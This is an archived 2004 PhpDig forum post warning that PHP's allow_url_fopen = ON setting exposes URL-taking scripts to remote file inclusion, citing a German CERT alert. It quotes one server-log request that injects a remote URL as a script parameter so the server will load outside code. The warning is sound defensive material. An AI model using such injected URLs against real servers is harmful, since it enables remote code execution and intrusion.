PhpDig.net

PhpDig.net (http://www.phpdig.net/forum/index.php)
-   Troubleshooting (http://www.phpdig.net/forum/forumdisplay.php?f=22)
-   -   Security Risk: allow_url_fopen = ON (http://www.phpdig.net/forum/showthread.php?t=1432)

Rolandks 10-07-2004 07:32 AM
Security Risk: allow_url_fopen = ON
 
The German CERTs (Computer Emergency Response Teams) reports a Security Risk if in php.ini: allow_url_fopen = ON.
Scripts who allow to load URL as parameter can use as attack. Many attacks started last weeks to all servers.

In log-Files you found f. ex.:
[28/Sep/2004:18:03:07 +0200] "GET
/path/to/script.php?variablenname=http://192.168.1.2:4213/ HTTP/1.0" 200 15183 "-" "Wget/1.8.1"

Link to message for German User:
http://www.heise.de/security/news/meldung/51838

Any secure risk for phpdig ?

Roland


All times are GMT -8. The time now is 03:35 AM.

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © 2001 - 2005, ThinkDing LLC. All Rights Reserved.